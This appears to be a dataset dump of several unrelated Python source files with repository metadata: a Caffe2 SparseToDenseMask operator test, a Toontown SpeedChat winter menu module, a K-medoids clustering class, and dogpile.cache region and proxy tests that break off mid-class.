] | 40 | 2021-06-01T07:37:59.000Z | 2022-03-25T01:42:09.000Z | caffe2/python/sparse_to_dense_mask_test.py | wenhaopeter/read_pytorch_code | 491f989cd918cf08874dd4f671fb7f0142a0bc4f | [
"Intel",
"X11"
] | 14 | 2021-06-01T11:52:46.000Z | 2022-03-25T02:13:08.000Z | caffe2/python/sparse_to_dense_mask_test.py | wenhaopeter/read_pytorch_code | 491f989cd918cf08874dd4f671fb7f0142a0bc4f | [
"Intel",
"X11"
] | 7 | 2021-07-20T19:34:26.000Z | 2022-03-13T21:07:36.000Z | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from caffe2.python import core, workspace
from caffe2.python.test_util import TestCase
import numpy as np
class TestSparseToDenseMask(TestCase):
def test_sparse_to_dense_mask_float(self):
op = core.CreateOperator(
'SparseToDenseMask',
['indices', 'values', 'default', 'lengths'],
['output'],
mask=[999999999, 2, 6])
workspace.FeedBlob(
'indices',
np.array([2, 4, 6, 1, 2, 999999999, 2], dtype=np.int32))
workspace.FeedBlob(
'values',
np.array([1, 2, 3, 4, 5, 6, 7], dtype=np.float))
workspace.FeedBlob('default', np.array(-1, dtype=np.float))
workspace.FeedBlob('lengths', np.array([3, 4], dtype=np.int32))
workspace.RunOperatorOnce(op)
output = workspace.FetchBlob('output')
expected = np.array([[-1, 1, 3], [6, 7, -1]], dtype=np.float)
self.assertEqual(output.shape, expected.shape)
np.testing.assert_array_equal(output, expected)
def test_sparse_to_dense_mask_invalid_inputs(self):
op = core.CreateOperator(
'SparseToDenseMask',
['indices', 'values', 'default', 'lengths'],
['output'],
mask=[999999999, 2],
max_skipped_indices=3)
workspace.FeedBlob(
'indices',
np.array([2000000000000, 999999999, 2, 3, 4, 5], dtype=np.int32))
workspace.FeedBlob(
'values',
np.array([1, 2, 3, 4, 5, 6], dtype=np.float))
workspace.FeedBlob('default', np.array(-1, dtype=np.float))
workspace.FeedBlob('lengths', np.array([6], dtype=np.int32))
try:
workspace.RunOperatorOnce(op)
except RuntimeError:
self.fail("Exception raised with only one negative index")
# 3 invalid inputs should throw.
workspace.FeedBlob(
'indices',
np.array([-1, 1, 2, 3, 4, 5], dtype=np.int32))
with self.assertRaises(RuntimeError):
workspace.RunOperatorMultiple(op, 3)
def test_sparse_to_dense_mask_subtensor(self):
op = core.CreateOperator(
'SparseToDenseMask',
['indices', 'values', 'default', 'lengths'],
['output'],
mask=[999999999, 2, 888, 6])
workspace.FeedBlob(
'indices',
np.array([2, 4, 6, 999999999, 2], dtype=np.int64))
workspace.FeedBlob(
'values',
np.array([[[1, -1]], [[2, -2]], [[3, -3]], [[4, -4]], [[5, -5]]],
dtype=np.float))
workspace.FeedBlob('default', np.array([[-1, 0]], dtype=np.float))
workspace.FeedBlob('lengths', np.array([2, 3], dtype=np.int32))
workspace.RunOperatorOnce(op)
output = workspace.FetchBlob('output')
expected = np.array([
[[[-1, 0]], [[1, -1]], [[-1, 0]], [[-1, 0]]],
[[[4, -4]], [[5, -5]], [[-1, 0]], [[3, -3]]]], dtype=np.float)
self.assertEqual(output.shape, expected.shape)
np.testing.assert_array_equal(output, expected)
def test_sparse_to_dense_mask_string(self):
op = core.CreateOperator(
'SparseToDenseMask',
['indices', 'values', 'default', 'lengths'],
['output'],
mask=[999999999, 2, 6])
workspace.FeedBlob(
'indices',
np.array([2, 4, 6, 1, 2, 999999999, 2], dtype=np.int32))
workspace.FeedBlob(
'values',
np.array(['1', '2', '3', '4', '5', '6', '7'], dtype='S'))
workspace.FeedBlob('default', np.array('-1', dtype='S'))
workspace.FeedBlob('lengths', np.array([3, 4], dtype=np.int32))
workspace.RunOperatorOnce(op)
output = workspace.FetchBlob('output')
expected =\
np.array([['-1', '1', '3'], ['6', '7', '-1']], dtype='S')
self.assertEqual(output.shape, expected.shape)
np.testing.assert_array_equal(output, expected)
def test_sparse_to_dense_mask_empty_lengths(self):
op = core.CreateOperator(
'SparseToDenseMask',
['indices', 'values', 'default'],
['output'],
mask=[1, 2, 6])
workspace.FeedBlob('indices', np.array([2, 4, 6], dtype=np.int32))
workspace.FeedBlob('values', np.array([1, 2, 3], dtype=np.float))
workspace.FeedBlob('default', np.array(-1, dtype=np.float))
workspace.RunOperatorOnce(op)
output = workspace.FetchBlob('output')
expected = np.array([-1, 1, 3], dtype=np.float)
self.assertEqual(output.shape, expected.shape)
np.testing.assert_array_equal(output, expected)
def test_sparse_to_dense_mask_no_lengths(self):
op = core.CreateOperator(
'SparseToDenseMask',
['indices', 'values', 'default'],
['output'],
mask=[1, 2, 6])
workspace.FeedBlob('indices', np.array([2, 4, 6], dtype=np.int32))
workspace.FeedBlob('values', np.array([1, 2, 3], dtype=np.float))
workspace.FeedBlob('default', np.array(-1, dtype=np.float))
workspace.RunOperatorOnce(op)
output = workspace.FetchBlob('output')
expected = np.array([-1, 1, 3], dtype=np.float)
self.assertEqual(output.shape, expected.shape)
np.testing.assert_array_equal(output, expected)
def test_sparse_to_dense_mask_presence_mask(self):
op = core.CreateOperator(
'SparseToDenseMask',
['indices', 'values', 'default', 'lengths'],
['output', 'presence_mask'],
mask=[11, 12],
return_presence_mask=True)
workspace.FeedBlob('indices', np.array([11, 12, 13], dtype=np.int32))
workspace.FeedBlob('values', np.array([11, 12, 13], dtype=np.float))
workspace.FeedBlob('default', np.array(-1, dtype=np.float))
workspace.FeedBlob('lengths', np.array([1, 2], dtype=np.int32))
workspace.RunOperatorOnce(op)
output = workspace.FetchBlob('output')
presence_mask = workspace.FetchBlob('presence_mask')
expected_output = np.array([[11, -1], [-1, 12]], dtype=np.float)
expected_presence_mask = np.array(
[[True, False], [False, True]],
dtype=np.bool)
self.assertEqual(output.shape, expected_output.shape)
np.testing.assert_array_equal(output, expected_output)
self.assertEqual(presence_mask.shape, expected_presence_mask.shape)
np.testing.assert_array_equal(presence_mask, expected_presence_mask)
| 42.468354 | 77 | 0.581371 |
e502132afad2126337227688ca11b3751a48a78e | 2,035 | py | Python | v2.5.7/toontown/speedchat/TTSCWinterMenu.py | TTOFFLINE-LEAK/ttoffline | bb0e91704a755d34983e94288d50288e46b68380 | [
"MIT"
] | 4 | 2019-07-01T15:46:43.000Z | 2021-07-23T16:26:48.000Z | v2.5.7/toontown/speedchat/TTSCWinterMenu.py | TTOFFLINE-LEAK/ttoffline | bb0e91704a755d34983e94288d50288e46b68380 | [
"MIT"
] | 1 | 2019-06-29T03:40:05.000Z | 2021-06-13T01:15:16.000Z | v2.5.7/toontown/speedchat/TTSCWinterMenu.py | TTOFFLINE-LEAK/ttoffline | bb0e91704a755d34983e94288d50288e46b68380 | [
"MIT"
] | 4 | 2019-07-28T21:18:46.000Z | 2021-02-25T06:37:25.000Z | from otp.otpbase import PythonUtil
from otp.speedchat.SCMenu import SCMenu
from otp.speedchat.SCMenuHolder import SCMenuHolder
from otp.speedchat.SCStaticTextTerminal import SCStaticTextTerminal
from toontown.speedchat.TTSCIndexedTerminal import TTSCIndexedTerminal
from otp.otpbase import OTPLocalizer
WinterMenu = [
(
OTPLocalizer.WinterMenuSections[0],
{30200: 30220, 30201: 30221,
30202: 30222,
30203: 30223,
30204: 30224,
30205: 30225}), (OTPLocalizer.WinterMenuSections[1], [30275, 30276, 30277])]
class TTSCWinterMenu(SCMenu):
def __init__(self, carol):
SCMenu.__init__(self)
self.__messagesChanged(carol)
def destroy(self):
SCMenu.destroy(self)
def clearMenu(self):
SCMenu.clearMenu(self)
def __messagesChanged(self, carol):
self.clearMenu()
try:
lt = base.localAvatar
except:
return
winterMenu = []
if carol:
winterMenu.append(WinterMenu[0])
winterMenu.append(WinterMenu[1])
for section in winterMenu:
if section[0] == -1:
for phrase in section[1]:
if phrase not in OTPLocalizer.SpeedChatStaticText:
print 'warning: tried to link Winter phrase %s which does not seem to exist' % phrase
break
self.append(SCStaticTextTerminal(phrase))
else:
menu = SCMenu()
for phrase in section[1].keys():
blatherTxt = section[1][phrase]
if blatherTxt not in OTPLocalizer.SpeedChatStaticText:
print 'warning: tried to link Winter phrase %s which does not seem to exist' % phrase
break
menu.append(TTSCIndexedTerminal(OTPLocalizer.SpeedChatStaticText.get(phrase, None), blatherTxt))
menuName = str(section[0])
self.append(SCMenuHolder(menuName, menu))
return | 34.491525 | 116 | 0.608845 |
5a1145df58acfce07b22110993cc707f5ae62207 | 6,446 | py | Python | sd/algorithms/extra/kmedoids.py | shibaji7/SuperDARN-Clustering | d7427ba609fb7f5e50c26f52364e5e9e118bbc31 | [
"Apache-2.0"
] | 1 | 2020-12-02T20:13:34.000Z | 2020-12-02T20:13:34.000Z | sd/algorithms/extra/kmedoids.py | shibaji7/SuperDARN-Clustering | d7427ba609fb7f5e50c26f52364e5e9e118bbc31 | [
"Apache-2.0"
] | null | null | null | sd/algorithms/extra/kmedoids.py | shibaji7/SuperDARN-Clustering | d7427ba609fb7f5e50c26f52364e5e9e118bbc31 | [
"Apache-2.0"
] | null | null | null | from scipy.sparse import csr_matrix
import numpy as np
import random
class KMedoids:
def __init__(self, n_clusters=2, max_iter=10, tol=0.1, start_prob=0.8, end_prob=0.99):
"""Kmedoids constructor called"""
if start_prob < 0 or start_prob >= 1 or end_prob < 0 or end_prob >= 1 or start_prob > end_prob:
raise ValueError("Invalid input")
self.n_clusters = n_clusters
self.max_iter = max_iter
self.tol = tol
self.start_prob = start_prob
self.end_prob = end_prob
self.medoids = []
self.clusters = {}
self.tol_reached = float("inf")
self.current_distance = 0
self.__data = None
self.__is_csr = None
self.__rows = 0
self.__columns = 0
self.cluster_distances = {}
def fit(self, data):
self.__data = csr_matrix(data)
self.__set_data_type()
self.__start_algo()
return self
def __update_labels(self):
self.labels = []
print(self.medoids,"\n",self.clusters)
self.labels = np.array(self.labels)
return
def __start_algo(self):
self.__initialize_medoids()
self.clusters, self.cluster_distances = self.__calculate_clusters(self.medoids)
self.__update_clusters()
self.__update_labels()
def __update_clusters(self):
for i in range(self.max_iter):
cluster_dist_with_new_medoids = self.__swap_and_recalculate_clusters()
if self.__is_new_cluster_dist_small(cluster_dist_with_new_medoids) == True:
self.clusters, self.cluster_distances = self.__calculate_clusters(self.medoids)
else:
break
def __is_new_cluster_dist_small(self, cluster_dist_with_new_medoids):
existance_dist = self.calculate_distance_of_clusters()
new_dist = self.calculate_distance_of_clusters(cluster_dist_with_new_medoids)
if existance_dist > new_dist and (existance_dist - new_dist) > self.tol:
self.medoids = cluster_dist_with_new_medoids.keys()
return True
return False
def calculate_distance_of_clusters(self, cluster_dist=None):
if cluster_dist == None:
cluster_dist = self.cluster_distances
dist = 0
for medoid in cluster_dist.keys():
dist += cluster_dist[medoid]
return dist
def __swap_and_recalculate_clusters(self):
# http://www.math.le.ac.uk/people/ag153/homepage/KmeansKmedoids/Kmeans_Kmedoids.html
cluster_dist = {}
for medoid in self.medoids:
is_shortest_medoid_found = False
for data_index in self.clusters[medoid]:
if data_index != medoid:
cluster_list = list(self.clusters[medoid])
cluster_list[self.clusters[medoid].index(data_index)] = medoid
new_distance = self.calculate_inter_cluster_distance(data_index, cluster_list)
if new_distance < self.cluster_distances[medoid]:
cluster_dist[data_index] = new_distance
is_shortest_medoid_found = True
break
if is_shortest_medoid_found == False:
cluster_dist[medoid] = self.cluster_distances[medoid]
return cluster_dist
def calculate_inter_cluster_distance(self, medoid, cluster_list):
distance = 0
for data_index in cluster_list:
distance += self.__get_distance(medoid, data_index)
return distance/len(cluster_list)
def __calculate_clusters(self, medoids):
clusters = {}
cluster_distances = {}
for medoid in medoids:
clusters[medoid] = []
cluster_distances[medoid] = 0
for row in range(self.__rows):
nearest_medoid, nearest_distance = self.__get_shortest_distance_to_mediod(row, medoids)
cluster_distances[nearest_medoid] += nearest_distance
clusters[nearest_medoid].append(row)
for medoid in medoids:
cluster_distances[medoid] /= len(clusters[medoid])
return clusters, cluster_distances
def __get_shortest_distance_to_mediod(self, row_index, medoids):
min_distance = float("inf")
current_medoid = None
for medoid in medoids:
current_distance = self.__get_distance(medoid, row_index)
if current_distance < min_distance:
min_distance = current_distance
current_medoid = medoid
return current_medoid, min_distance
def __initialize_medoids(self):
"""Kmeans++ initialisation"""
self.medoids.append(random.randint(0,self.__rows-1))
while len(self.medoids) != self.n_clusters:
self.medoids.append(self.__find_distant_medoid())
def __find_distant_medoid(self):
distances = []
indices = []
for row in range(self.__rows):
indices.append(row)
distances.append(self.__get_shortest_distance_to_mediod(row,self.medoids)[1])
distances_index = np.argsort(distances)
choosen_dist = self.__select_distant_medoid(distances_index)
return indices[choosen_dist]
def __select_distant_medoid(self, distances_index):
start_index = round(self.start_prob*len(distances_index))
end_index = round(self.end_prob*(len(distances_index)-1))
return distances_index[random.randint(start_index, end_index)]
def __get_distance(self, x1, x2):
a = self.__data[x1].toarray() if self.__is_csr == True else np.array(self.__data[x1])
b = self.__data[x2].toarray() if self.__is_csr == True else np.array(self.__data[x2])
return np.linalg.norm(a-b)
def __set_data_type(self):
"""to check whether the given input is of type "list" or "csr" """
if isinstance(self.__data,csr_matrix):
self.__is_csr = True
self.__rows = self.__data.shape[0]
self.__columns = self.__data.shape[1]
elif isinstance(self.__data,list):
self.__is_csr = False
self.__rows = len(self.__data)
self.__columns = len(self.__data[0])
else:
raise ValueError("Invalid input")
| 39.790123 | 103 | 0.624263 |
b49076b62fad277962af24bb0d2f20cfbe32cabf | 26,967 | py | Python | tests/cache/test_region.py | shanesaravia/dogpile.cache | 21a8248bb7a20863a0267e0069225fb416e73ca9 | [
"BSD-3-Clause"
] | null | null | null | tests/cache/test_region.py | shanesaravia/dogpile.cache | 21a8248bb7a20863a0267e0069225fb416e73ca9 | [
"BSD-3-Clause"
] | null | null | null | tests/cache/test_region.py | shanesaravia/dogpile.cache | 21a8248bb7a20863a0267e0069225fb416e73ca9 | [
"BSD-3-Clause"
] | null | null | null | from collections import defaultdict
import datetime
import itertools
import time
from unittest import TestCase
import mock
from dogpile.cache import CacheRegion
from dogpile.cache import exception
from dogpile.cache import make_region
from dogpile.cache.api import CacheBackend
from dogpile.cache.api import CachedValue
from dogpile.cache.api import NO_VALUE
from dogpile.cache.proxy import ProxyBackend
from dogpile.cache.region import _backend_loader
from dogpile.cache.region import RegionInvalidationStrategy
from dogpile.util import compat
from . import assert_raises_message
from . import configparser
from . import eq_
from . import io
from . import is_
from ._fixtures import MockBackend
def key_mangler(key):
return "HI!" + key
class APITest(TestCase):
def test_no_value_str(self):
eq_(str(NO_VALUE), "<dogpile.cache.api.NoValue object>")
class RegionTest(TestCase):
def _region(self, init_args={}, config_args={}, backend="mock"):
reg = CacheRegion(**init_args)
reg.configure(backend, **config_args)
return reg
def test_set_name(self):
my_region = make_region(name="my-name")
eq_(my_region.name, "my-name")
def test_instance_from_dict(self):
my_conf = {
"cache.example.backend": "mock",
"cache.example.expiration_time": 600,
"cache.example.arguments.url": "127.0.0.1",
}
my_region = make_region()
my_region.configure_from_config(my_conf, "cache.example.")
eq_(my_region.expiration_time, 600)
assert isinstance(my_region.backend, MockBackend) is True
eq_(my_region.backend.arguments, {"url": "127.0.0.1"})
def test_instance_from_config_string(self):
my_conf = (
"[xyz]\n"
"cache.example.backend=mock\n"
"cache.example.expiration_time=600\n"
"cache.example.arguments.url=127.0.0.1\n"
"cache.example.arguments.dogpile_lockfile=false\n"
"cache.example.arguments.xyz=None\n"
)
my_region = make_region()
config = configparser.ConfigParser()
compat.read_config_file(config, io.StringIO(my_conf))
my_region.configure_from_config(
dict(config.items("xyz")), "cache.example."
)
eq_(my_region.expiration_time, 600)
assert isinstance(my_region.backend, MockBackend) is True
eq_(
my_region.backend.arguments,
{"url": "127.0.0.1", "dogpile_lockfile": False, "xyz": None},
)
def test_datetime_expiration_time(self):
my_region = make_region()
my_region.configure(
backend="mock", expiration_time=datetime.timedelta(days=1, hours=8)
)
eq_(my_region.expiration_time, 32 * 60 * 60)
def test_reject_invalid_expiration_time(self):
my_region = make_region()
assert_raises_message(
exception.ValidationError,
"expiration_time is not a number or timedelta.",
my_region.configure,
"mock",
"one hour",
)
def test_key_mangler_argument(self):
reg = self._region(init_args={"key_mangler": key_mangler})
assert reg.key_mangler is key_mangler
reg = self._region()
assert reg.key_mangler is None
MockBackend.key_mangler = lambda self, k: "foo"
reg = self._region()
eq_(reg.key_mangler("bar"), "foo")
MockBackend.key_mangler = None
def test_key_mangler_impl(self):
reg = self._region(init_args={"key_mangler": key_mangler})
reg.set("some key", "some value")
eq_(list(reg.backend._cache), ["HI!some key"])
eq_(reg.get("some key"), "some value")
eq_(
reg.get_or_create("some key", lambda: "some new value"),
"some value",
)
reg.delete("some key")
eq_(reg.get("some key"), NO_VALUE)
def test_dupe_config(self):
reg = CacheRegion()
reg.configure("mock")
assert_raises_message(
exception.RegionAlreadyConfigured,
"This region is already configured",
reg.configure,
"mock",
)
eq_(reg.is_configured, True)
def test_replace_backend_config(self):
reg = CacheRegion()
reg.configure("dogpile.cache.null")
eq_(reg.is_configured, True)
null_backend = _backend_loader.load("dogpile.cache.null")
assert reg.key_mangler is null_backend.key_mangler
reg.configure("mock", replace_existing_backend=True)
eq_(reg.is_configured, True)
assert isinstance(reg.backend, MockBackend)
assert reg.key_mangler is MockBackend.key_mangler
def test_replace_backend_config_with_custom_key_mangler(self):
reg = CacheRegion(key_mangler=key_mangler)
reg.configure("dogpile.cache.null")
eq_(reg.is_configured, True)
assert reg.key_mangler is key_mangler
reg.configure("mock", replace_existing_backend=True)
eq_(reg.is_configured, True)
assert reg.key_mangler is key_mangler
def test_no_config(self):
reg = CacheRegion()
assert_raises_message(
exception.RegionNotConfigured,
"No backend is configured on this region.",
getattr,
reg,
"backend",
)
eq_(reg.is_configured, False)
def test_invalid_backend(self):
reg = CacheRegion()
assert_raises_message(
exception.PluginNotFound,
"Couldn't find cache plugin to load: unknown",
reg.configure,
"unknown",
)
eq_(reg.is_configured, False)
def test_set_get_value(self):
reg = self._region()
reg.set("some key", "some value")
eq_(reg.get("some key"), "some value")
def test_set_get_nothing(self):
reg = self._region()
eq_(reg.get("some key"), NO_VALUE)
eq_(reg.get("some key", expiration_time=10), NO_VALUE)
reg.invalidate()
eq_(reg.get("some key"), NO_VALUE)
def test_creator(self):
reg = self._region()
def creator():
return "some value"
eq_(reg.get_or_create("some key", creator), "some value")
def test_multi_creator(self):
reg = self._region()
def creator(*keys):
return ["some value %s" % key for key in keys]
eq_(
reg.get_or_create_multi(["k3", "k2", "k5"], creator),
["some value k3", "some value k2", "some value k5"],
)
def test_remove(self):
reg = self._region()
reg.set("some key", "some value")
reg.delete("some key")
reg.delete("some key")
eq_(reg.get("some key"), NO_VALUE)
def test_expire(self):
reg = self._region(config_args={"expiration_time": 1})
counter = itertools.count(1)
def creator():
return "some value %d" % next(counter)
eq_(reg.get_or_create("some key", creator), "some value 1")
time.sleep(2)
is_(reg.get("some key"), NO_VALUE)
eq_(reg.get("some key", ignore_expiration=True), "some value 1")
eq_(
reg.get_or_create("some key", creator, expiration_time=-1),
"some value 1",
)
eq_(reg.get_or_create("some key", creator), "some value 2")
eq_(reg.get("some key"), "some value 2")
def test_expire_multi(self):
reg = self._region(config_args={"expiration_time": 1})
counter = itertools.count(1)
def creator(*keys):
return ["some value %s %d" % (key, next(counter)) for key in keys]
eq_(
reg.get_or_create_multi(["k3", "k2", "k5"], creator),
["some value k3 2", "some value k2 1", "some value k5 3"],
)
time.sleep(2)
is_(reg.get("k2"), NO_VALUE)
eq_(reg.get("k2", ignore_expiration=True), "some value k2 1")
eq_(
reg.get_or_create_multi(["k3", "k2"], creator, expiration_time=-1),
["some value k3 2", "some value k2 1"],
)
eq_(
reg.get_or_create_multi(["k3", "k2"], creator),
["some value k3 5", "some value k2 4"],
)
eq_(reg.get("k2"), "some value k2 4")
def test_expire_on_get(self):
reg = self._region(config_args={"expiration_time": 0.5})
reg.set("some key", "some value")
eq_(reg.get("some key"), "some value")
time.sleep(1)
is_(reg.get("some key"), NO_VALUE)
def test_ignore_expire_on_get(self):
reg = self._region(config_args={"expiration_time": 0.5})
reg.set("some key", "some value")
eq_(reg.get("some key"), "some value")
time.sleep(1)
eq_(reg.get("some key", ignore_expiration=True), "some value")
def test_override_expire_on_get(self):
reg = self._region(config_args={"expiration_time": 0.5})
reg.set("some key", "some value")
eq_(reg.get("some key"), "some value")
time.sleep(1)
eq_(reg.get("some key", expiration_time=5), "some value")
is_(reg.get("some key"), NO_VALUE)
def test_expire_override(self):
reg = self._region(config_args={"expiration_time": 5})
counter = itertools.count(1)
def creator():
return "some value %d" % next(counter)
eq_(
reg.get_or_create("some key", creator, expiration_time=1),
"some value 1",
)
time.sleep(2)
eq_(reg.get("some key"), "some value 1")
eq_(
reg.get_or_create("some key", creator, expiration_time=1),
"some value 2",
)
eq_(reg.get("some key"), "some value 2")
def test_hard_invalidate_get(self):
reg = self._region()
reg.set("some key", "some value")
time.sleep(0.1)
reg.invalidate()
is_(reg.get("some key"), NO_VALUE)
def test_hard_invalidate_get_or_create(self):
reg = self._region()
counter = itertools.count(1)
def creator():
return "some value %d" % next(counter)
eq_(reg.get_or_create("some key", creator), "some value 1")
time.sleep(0.1)
reg.invalidate()
eq_(reg.get_or_create("some key", creator), "some value 2")
eq_(reg.get_or_create("some key", creator), "some value 2")
reg.invalidate()
eq_(reg.get_or_create("some key", creator), "some value 3")
eq_(reg.get_or_create("some key", creator), "some value 3")
def test_hard_invalidate_get_or_create_multi(self):
reg = self._region()
counter = itertools.count(1)
def creator(*keys):
return ["some value %s %d" % (k, next(counter)) for k in keys]
eq_(
reg.get_or_create_multi(["k1", "k2"], creator),
["some value k1 1", "some value k2 2"],
)
time.sleep(0.1)
reg.invalidate()
eq_(
reg.get_or_create_multi(["k1", "k2"], creator),
["some value k1 3", "some value k2 4"],
)
eq_(
reg.get_or_create_multi(["k1", "k2"], creator),
["some value k1 3", "some value k2 4"],
)
reg.invalidate()
eq_(
reg.get_or_create_multi(["k1", "k2"], creator),
["some value k1 5", "some value k2 6"],
)
eq_(
reg.get_or_create_multi(["k1", "k2"], creator),
["some value k1 5", "some value k2 6"],
)
def test_soft_invalidate_get(self):
reg = self._region(config_args={"expiration_time": 1})
reg.set("some key", "some value")
time.sleep(0.1)
reg.invalidate(hard=False)
is_(reg.get("some key"), NO_VALUE)
def test_soft_invalidate_get_or_create(self):
reg = self._region(config_args={"expiration_time": 1})
counter = itertools.count(1)
def creator():
return "some value %d" % next(counter)
eq_(reg.get_or_create("some key", creator), "some value 1")
time.sleep(0.1)
reg.invalidate(hard=False)
eq_(reg.get_or_create("some key", creator), "some value 2")
def test_soft_invalidate_get_or_create_multi(self):
reg = self._region(config_args={"expiration_time": 5})
values = [1, 2, 3]
def creator(*keys):
v = values.pop(0)
return [v for k in keys]
ret = reg.get_or_create_multi([1, 2], creator)
eq_(ret, [1, 1])
time.sleep(0.1)
reg.invalidate(hard=False)
ret = reg.get_or_create_multi([1, 2], creator)
eq_(ret, [2, 2])
def test_soft_invalidate_requires_expire_time_get(self):
reg = self._region()
reg.invalidate(hard=False)
assert_raises_message(
exception.DogpileCacheException,
"Non-None expiration time required for soft invalidation",
reg.get_or_create,
"some key",
lambda: "x",
)
def test_soft_invalidate_requires_expire_time_get_multi(self):
reg = self._region()
reg.invalidate(hard=False)
assert_raises_message(
exception.DogpileCacheException,
"Non-None expiration time required for soft invalidation",
reg.get_or_create_multi,
["k1", "k2"],
lambda k: "x",
)
def test_should_cache_fn(self):
reg = self._region()
values = [1, 2, 3]
def creator():
return values.pop(0)
should_cache_fn = lambda val: val in (1, 3) # noqa
ret = reg.get_or_create(
"some key", creator, should_cache_fn=should_cache_fn
)
eq_(ret, 1)
eq_(reg.backend._cache["some key"][0], 1)
time.sleep(0.1)
reg.invalidate()
ret = reg.get_or_create(
"some key", creator, should_cache_fn=should_cache_fn
)
eq_(ret, 2)
eq_(reg.backend._cache["some key"][0], 1)
reg.invalidate()
ret = reg.get_or_create(
"some key", creator, should_cache_fn=should_cache_fn
)
eq_(ret, 3)
eq_(reg.backend._cache["some key"][0], 3)
def test_should_cache_fn_multi(self):
reg = self._region()
values = [1, 2, 3]
def creator(*keys):
v = values.pop(0)
return [v for k in keys]
should_cache_fn = lambda val: val in (1, 3) # noqa
ret = reg.get_or_create_multi(
[1, 2], creator, should_cache_fn=should_cache_fn
)
eq_(ret, [1, 1])
eq_(reg.backend._cache[1][0], 1)
time.sleep(0.1)
reg.invalidate()
ret = reg.get_or_create_multi(
[1, 2], creator, should_cache_fn=should_cache_fn
)
eq_(ret, [2, 2])
eq_(reg.backend._cache[1][0], 1)
time.sleep(0.1)
reg.invalidate()
ret = reg.get_or_create_multi(
[1, 2], creator, should_cache_fn=should_cache_fn
)
eq_(ret, [3, 3])
eq_(reg.backend._cache[1][0], 3)
def test_should_set_multiple_values(self):
reg = self._region()
values = {"key1": "value1", "key2": "value2", "key3": "value3"}
reg.set_multi(values)
eq_(values["key1"], reg.get("key1"))
eq_(values["key2"], reg.get("key2"))
eq_(values["key3"], reg.get("key3"))
def test_should_get_multiple_values(self):
reg = self._region()
values = {"key1": "value1", "key2": "value2", "key3": "value3"}
reg.set_multi(values)
reg_values = reg.get_multi(["key1", "key2", "key3"])
eq_(reg_values, ["value1", "value2", "value3"])
def test_should_delete_multiple_values(self):
reg = self._region()
values = {"key1": "value1", "key2": "value2", "key3": "value3"}
reg.set_multi(values)
reg.delete_multi(["key2", "key1000"])
eq_(values["key1"], reg.get("key1"))
eq_(NO_VALUE, reg.get("key2"))
eq_(values["key3"], reg.get("key3"))
class ProxyRegionTest(RegionTest):
""" This is exactly the same as the region test above, but it goes through
a dummy proxy. The purpose of this is to make sure the tests still run
successfully even when there is a proxy """
class MockProxy(ProxyBackend):
@property
def _cache(self):
return self.proxied._cache
def _region(self, init_args={}, config_args={}, backend="mock"):
reg = CacheRegion(**init_args)
config_args["wrap"] = [ProxyRegionTest.MockProxy]
reg.configure(backend, **config_args)
return reg
class CustomInvalidationStrategyTest(RegionTest):
"""Try region tests with custom invalidation strategy.
This is exactly the same as the region test above, but it uses custom
invalidation strategy. The purpose of this is to make sure the tests
still run successfully even when there is a proxy.
"""
class CustomInvalidationStrategy(RegionInvalidationStrategy):
def __init__(self):
self._soft_invalidated = None
self._hard_invalidated = None
def invalidate(self, hard=None):
if hard:
self._soft_invalidated = None
self._hard_invalidated = time.time()
else:
self._soft_invalidated = time.time()
self._hard_invalidated = None
def is_invalidated(self, timestamp):
return (
self._soft_invalidated and timestamp < self._soft_invalidated
) or (
self._hard_invalidated and timestamp < self._hard_invalidated
)
def was_hard_invalidated(self):
return bool(self._hard_invalidated)
def is_hard_invalidated(self, timestamp):
return (
self._hard_invalidated and timestamp < self._hard_invalidated
)
def was_soft_invalidated(self):
return bool(self._soft_invalidated)
def is_soft_invalidated(self, timestamp):
return (
self._soft_invalidated and timestamp < self._soft_invalidated
)
def _region(self, init_args={}, config_args={}, backend="mock"):
reg = CacheRegion(**init_args)
invalidator = self.CustomInvalidationStrategy()
reg.configure(backend, region_invalidator=invalidator, **config_args)
return reg
class TestProxyValue(object):
def __init__(self, value):
self.value = value
class AsyncCreatorTest(TestCase):
def _fixture(self):
def async_creation_runner(cache, somekey, creator, mutex):
try:
value = creator()
cache.set(somekey, value)
finally:
mutex.release()
return mock.Mock(side_effect=async_creation_runner)
def test_get_or_create(self):
acr = self._fixture()
reg = CacheRegion(async_creation_runner=acr)
reg.configure("mock", expiration_time=0.2)
def some_value():
return "some value"
def some_new_value():
return "some new value"
eq_(reg.get_or_create("some key", some_value), "some value")
time.sleep(0.5)
eq_(reg.get_or_create("some key", some_new_value), "some value")
eq_(reg.get_or_create("some key", some_new_value), "some new value")
eq_(
acr.mock_calls,
[
mock.call(
reg, "some key", some_new_value, reg._mutex("some key")
)
],
)
def test_fn_decorator(self):
acr = self._fixture()
reg = CacheRegion(async_creation_runner=acr)
reg.configure("mock", expiration_time=5)
canary = mock.Mock()
@reg.cache_on_arguments()
def go(x, y):
canary(x, y)
return x + y
eq_(go(1, 2), 3)
eq_(go(1, 2), 3)
eq_(canary.mock_calls, [mock.call(1, 2)])
eq_(go(3, 4), 7)
eq_(canary.mock_calls, [mock.call(1, 2), mock.call(3, 4)])
reg.invalidate(hard=False)
eq_(go(1, 2), 3)
eq_(
canary.mock_calls,
[mock.call(1, 2), mock.call(3, 4), mock.call(1, 2)],
)
eq_(
acr.mock_calls,
[
mock.call(
reg,
"tests.cache.test_region:go|1 2",
mock.ANY,
reg._mutex("tests.cache.test_region:go|1 2"),
)
],
)
def test_fn_decorator_with_kw(self):
acr = self._fixture()
reg = CacheRegion(async_creation_runner=acr)
reg.configure("mock", expiration_time=5)
@reg.cache_on_arguments()
def go(x, **kw):
return x
test_value = TestProxyValue("Decorator Test")
self.assertRaises(ValueError, go, x=1, foo=test_value)
@reg.cache_on_arguments()
def go2(x):
return x
# keywords that match positional names can be passed
result = go2(x=test_value)
self.assertTrue(isinstance(result, TestProxyValue))
class ProxyBackendTest(TestCase):
class GetCounterProxy(ProxyBackend):
counter = 0
def get(self, key):
ProxyBackendTest.GetCounterProxy.counter += 1
return self.proxied.get(key)
class SetCounterProxy(ProxyBackend):
counter = 0
def set(self, key, value):
ProxyBackendTest.SetCounterProxy.counter += 1
return self.proxied.set(key, value)
class UsedKeysProxy(ProxyBackend):
""" Keep a counter of hose often we set a particular key"""
def __init__(self, *args, **kwargs):
super(ProxyBackendTest.UsedKeysProxy, self).__init__(
*args, **kwargs
)
self._key_count = defaultdict(lambda: 0)
def setcount(self, key):
return self._key_count[key]
def set(self, key, value):
self._key_count[key] += 1
self.proxied.set(key, value)
class NeverSetProxy(ProxyBackend):
""" A totally contrived example of a Proxy that we pass arguments to.
Never set a key that matches never_set """
